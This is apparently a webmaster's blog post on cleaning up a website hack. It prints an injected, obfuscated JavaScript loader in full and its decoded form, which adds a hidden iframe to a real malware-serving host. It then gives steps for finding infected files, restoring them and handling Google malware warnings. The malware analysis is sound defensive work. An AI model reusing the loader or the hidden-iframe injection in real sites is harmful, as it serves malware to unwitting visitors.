The hack uses some obfuscated JavaScript
var i,j,key; i = 0; j = 1; for(i=0; i < 20; i++) { key = j + i + 20; j = key - 10; } el=document.create?Element("div"); el.inner?HTML="ren"; el.inner?HTML+="ceErr"; el.appendChild(document.createTextNode("q")); el.appendChild(document.createTextNode("l")); el2=el.removeChild(el.lastChild); try{try{throw 1}catch(a){b[2]=21}; }catch(a){with(el){k=firstChild.nodeValue; }}; ar=" < iuD \"'rwB [.f1beJlmEN0; > Tg(xI{Fh,QA/n=:kHdC)ovc]}tYyasp"; ar2="R16c0c-12c48c-12c68c60c12c8c-180c68c-12c84c52c-152c56c-40c136c-120c-8c-8c12c-12c84c52c16c-180c172c-108c112c-108c-20c128c-136c-12c44c-84c36c120c-12c40c-184c152c-132c44c104c-16c-56c-104c0c0c-12c48c-24c184c-136c-12c-36c80c68c-84c-76c0c180c-156c24c8c144c-152c-24c80c-104c0c0c152c12c8c-180c68c-12c84c52c-152c-16c-4c-24c196c-136c44c-88c-20c4c48c-24c184c-136c-12c-24c176c-188c160c-36c-128c104c72c0c20c-64c-12c0c76c-40c-108c88c20c-132c140c-76c-64c140c0c-44c-8c0c24c-36c-88c-4c104c28c-128c100c-56c-68c24c-4c172c-168c44c80c28c-120c-32c100c52c-108c60c-108c156c-24c-24c-4c-20c-36c60c-4c16c0c-128c16c-8c-28c164c32c-72c24c-128c32c32c-64c16c88c-64c-60c100c24c72c-48c-128c32c32c-64c16c176c-16c8c-136c-8c88c-128c160c-180c212c-212c56c-56c68c-68c196c8c-52c-28c-124c164c0c-104c84c-56c128c-40c36c-212c196c-196c176c-32c8c56c-152c156c-36c-108c-64c192c-136c28c-20c-8c-12c148c-44c-68c4c108c-20c40c-64c-68c4c-68c72c-96c144c-140c48c-24c184c-136c-12c32c-76c156c-84c-76c0c180c-180c0c36c-44c140c40c12c-196c176c-32c-108c-36c48c-24c184c-136c-12c-36c80c68c-56c-104c0c0c168c28c-184c12c12c-12c112c-112c128c12c8c-180c68c-12c84c52c-152c140c-160c36c148c-12c-136c16c-8c-8c12c-12c84c52c-92c-84c-20c48c-24c184c-136c-12c-40c152c-84c-40c-4c168c-152c136c-60c60c0c-172c-24c56c-52c192c-136c44c-84c192c-188c160c-164c108c-108c104c72c0c20c-64c-12c0c76c-40c-108c88c20c-132c140c-76c-64c140c0c-44c-8c0c24c-36c-88c-4c104c28c-128c100c-56c-68c24c-4c172c-168c44c80c28c-120c-32c100c52c-108c60c-108c156c-24c-24c-4c-20c-36c60c-4c16c0c-128c152c-84c-40c-4c168c-16c8c-136c-8c-16c136c-180c212c-212c56c-56c68c-68c196c8c-56c-128c104c-124c164c0c-104c84c-124c68c-40c-4c168c-16c8c-136c-8c-16c172c-40c36c-212c196c-196c176c-32c4c-128c188c-152c156c-36c-108c-64c192c-136c-40c68c-40c-4c168c-16c8c-136c-8c-16c24c-8c-12c148c-48c-128c64c-64c68c-40c-4c168c-16c8c-136c-8c-16c152c-20c40c-68c-128c64c-64c68c-40c-4c168c-152c136c-60c60c0c-172c-24c56c-52c192c-136c44c-84c8c-28c164c32c-72c-104c108c-108c32c32c-64c152c-84c-40c-4c168c-152c136c-60c60c0c-172c-24c56c-52c192c-136c44c-84c104c-64c-60c100c24c72c-176c108c-108c32c32c-64c152c-84c-76c0c0c152c12c8c-180c68c-12c84c52c-152c56c-40c136c-120c-8c-8c12c-12c84c52c16c-180c172c-108c112c-108c-20c128c-136c-12c44c-84c36c120c-12c40c-184c152c-132c44c104c-144c164c8c0c-156c84c20c4c-44c-124c68c96c-60c-56c124c-84c-76c0c180"; try{throw 1; }catch(a){pau="urn erenceErr".re?place(k,"va"+el2.nodeValue); }
e=Function("ret"+pau)(); ar2=ar2.split("c"); ar2[0]="16"; s=""; pos=0; i=0; while(i < 611){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4'); e('s+=ar.su'+''+'bstr(pos,1)'); i++; }
e(s);
e=Function("ret"+pau)(); ar2=ar2.split("c"); ar2[0]="16"; s=""; pos=0; i=0; while(i < 611){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4'); e('s+=ar.su'+''+'bstr(pos,1)'); i++; }
e(s);
which de-obfuscates to
if (document.getElementsByTagName('body')[0]){
iframer();
}
else {
document.write("
<iframe src='http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==' width='10' height='1
0' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
iframer();
}
else {
document.write("
<iframe src='http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==' width='10' height='1
0' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
which adds an iframe to the pages of a site. In the majority of the hacks I have seen the URL in the source attribute (http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==) of the iframe redirects to dalanaya.cz.cc where the malicious code is actually hosted.
There are a number of variations to this script, another common one is
var i,j,key; i = 0; j = 1; for(i=0;i < 20;i++) { key = j + i + 20; j = key - 10; } var s,w=-4+ +"2",aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+w,11+w,107+w,104+w,34+w,42+w,102+w,113+w,101+w,119+w,
111+w,103+w,112+w,118+w,48+w,105+w,103+w,118+w,71+w,110+w,103+w,111+w,103+w,
112+w,118+w,117+w,68+w,123+w,86+w,99+w,105+w,80+w,99+w,111+w,103+w,42+w,41+w,
100+w,113+w,102+w,123+w,41+w,43+w,93+w,50+w,95+w,43+w,125+w,11+w,11+w,11+w,
107+w,104+w,116+w,99+w,111+w,103+w,116+w,42+w,43+w, .........
111+w,103+w,112+w,118+w,48+w,105+w,103+w,118+w,71+w,110+w,103+w,111+w,103+w,
112+w,118+w,117+w,68+w,123+w,86+w,99+w,105+w,80+w,99+w,111+w,103+w,42+w,41+w,
100+w,113+w,102+w,123+w,41+w,43+w,93+w,50+w,95+w,43+w,125+w,11+w,11+w,11+w,
107+w,104+w,116+w,99+w,111+w,103+w,116+w,42+w,43+w, .........
The bottom line is -- If you see blocks of obfuscated script like these in you files make absolutely sure that you know what they do.
In the many/most of the sites I have looked at (all but two) the malicious JavaScript was added to one or more of the legitimate JavaScript files on the site. In one site the code was in the homepage of the site inserted right after the </html> tag, and another a rogue .js file was added to the site and linked on several of the sites pages.
The first step in clearing this hack is to locate the file(s) containing the malicious script. As always if Google has provided a list of pages that they have detected as malicious start by checking those, but if not start with your homepage. You can open the files in your editor or if you prefer you can check them in your browser. If you are going to check any of your pages on-line it is always a good idea to use one of the on-line tools suach as Redleg's File Viewer to check the contents of your page. These tools allow you to view the file a little more safely as they render the script non-executable (or at least they try to.)
If you are familiar with the JavaScript files on your site you might want to start out by checking the contents of all "legitimate" JavaScript files on your site. Don't stop checking if/when you find the first infected file as in all likelihood there will be more than one. I have also seen on some sites the hackers have added a "not legitimate" JavaScript file to the site and linked it from some of the sites pages. This file can be placed in virtually any folder on the site so these "rogue" script files cam be difficult to locate.
If you start out checking a html (php/jsp/asp) page in all probability you will not see the block of malicious script, but, you still should check you html pages. Take a look though the file to find any JavaScript files being used in the page, look for lines of code like this
<script src="/e107_files/popup.js" type="text/javascript"></script>
<script src="/e107_files/e107.js" type="text/javascript"></script>
<script src="/e107_files/nav_menu_alt.js" type="text/javascript"></script>
Note: I have used the e107 JavaScript files in the example above as these were the files that had been hacked on many of the sites I have looked at. This was not due to any inherent vulnerability in the e107 files, in fact all of these sites had been hacked through compromised passwords. It appears these files were used by the hackers as they were used in the majority of the sites pages, as opposed to a script such as swfobject.js, which was only being used in a small number of pages on the site.
Once you have located the infected files replacing them with a known clean copy is always the safest route. If you have any doubts about your "clean copy" you can usually download a clean copy from the original source for the file. If the known clean copy route is not an option then first make a back up of the file and then delete the block of malicious JavaScript. Once you have deleted the code test your pages to make sure you are not getting any JavaScript errors, at least not getting any new ones, and that any dynamic elements in the page are working properly. If they are not you can restore from the back up you made and try deleting only the malicious code again.
Once you have everything cleaned up and your site secured the final step is to determine if you need to submit a malware Request a Review to Google. I often get the comment "If I need to submit a request? you dummy, I am geeting a malware warning of course I need to submit a request!" Well in some cases "it ain't necessarily so" in fact in many cases it will not even be possible.
The first step is to check Google's safe browsing diagnostic page for your site at
http://www.google.com/safebrowsing/diagnostic?site=polko.cx.cc/
(substitute your domain for polko.cx.cc)
If your site is listed as suspicious
What is the current listing status for polko.cx.cc?
Site is listed as suspicious - visiting this web site may harm your computer.
then you will need to submit a malware request to Google in the Webmaster Tools account for the site. However if you check the diagnostic page for your site and it reads
What is the current listing status for yoursite.com?
This site is not currently listed as suspicious.
OK so Google is not flagging my site but I am definitely getting a malware warning blocking access to my site, now what? If you are getting a warning on one or more of the pages of your site in browsers such as Chrome, Firefox or Safari and your site is not (yet) flagged by Google it is probably a cross-site warning. If browsers such as Chrome detect code on your page (scripts, iframes) that load content from or redirect to a flagged site the browser will throw up a warning. The warning will not identify your site it will identify the site that is hosting the malware that is being loaded on your page. SEE:
Cross-site Warnings
Oliver Fisher Friday, January 23, 2009
Oliver Fisher Friday, January 23, 2009
Once you have removed all links/iframes, etc. to any blacklisted sites the warning should go away.
Note: With a cross site warning you will only get the warning on a page that is infected, the warning will only pop up when the page tries to load content from a site which is already flagged. If you are getting a cross site warning on a page it is a pretty good indicator that the page, or a script being called in that page is infected. However if your site is flagged by Google, the diagnostic page says suspicious then you will get the warning on every page of your site even if they are not infected.
Good Luck with your site and as always I hope this is the first, and more importantly the last, time you ever read my blog!
0 comments:
Post a Comment